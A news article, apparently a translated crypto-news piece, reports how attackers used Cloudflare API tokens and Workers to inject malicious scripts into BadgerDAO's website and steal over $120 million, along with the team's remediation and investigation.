Team DeFi-protocol BadgerDAO revealed the details of a recent hack and reported that during the attack, the hackers used the Cloudflare Workers service, which allows them to deploy scripts on the company’s cloud network.
We believe that all remediation decisions should be made as a community with strong consideration for the long term health of the DAO and victims of this incident.
You can review a detailed technical post mortem of the incident below.
– ₿adgerDAO 🦡 (@BadgerDAO) December 10, 2021
The developers paid attention to messagewhich appeared on the Cloudflare forum at the end of September. One participant noticed that unauthorized users can register accounts and create and view API– tokens that cannot be deleted or deactivated until the completion of the email verification.
After completing these steps, an attacker can wait for the account to be verified and completed, thus gaining access to the API.
After the incident, the BadgerDAO team analyzed the Cloudflare logs and found traces of unauthorized account registration and key generation for three APIs.
In mid-September, developers “unknowingly completed account registration” for one of the compromised interfaces, which was “used for legitimate Cloudflare management activities.”
“The user interface does not make it clear that the account has already been created, so a key was generated for the API. On November 10, an attacker used API access to inject malicious scripts through Cloudflare Workers into the html file of the app.badger.com website, ”the developers wrote.
The hacker has stolen assets worth more than $ 130 million, but about $ 9 million can be returned, since they have not yet been removed from the protocol vaults. Thus, the damage exceeded $ 121 million.
The project team reported that it has already closed the exploit that made the attack possible, updated the password for the Cloudflare account, and removed or updated API keys.
Since the identity of the hacker has not yet been identified, BadgerDAO brought in Mandiant and Chainalysis to investigate the incident. The developers added that they are cooperating with law enforcement agencies in the United States and Canada.
In conversation with Bloomberg a Cloudflare spokesman stressed that the company’s systems “were not hacked,” and there are no vulnerabilities in the Workers service.
“Last week we learned about the BadgerDAO incident. We contacted the project team and provided active assistance in the investigation, ”he said.
As a reminder, in September, unknown persons obtained unauthorized access to Bitcoin.org and posted a fraudulent announcement on the distribution of cryptocurrency on its main page. Site operator Cobra suggested that the issue could be related to Cloudflare’s services.
Found a mistake in the text? Select it and press CTRL + ENTER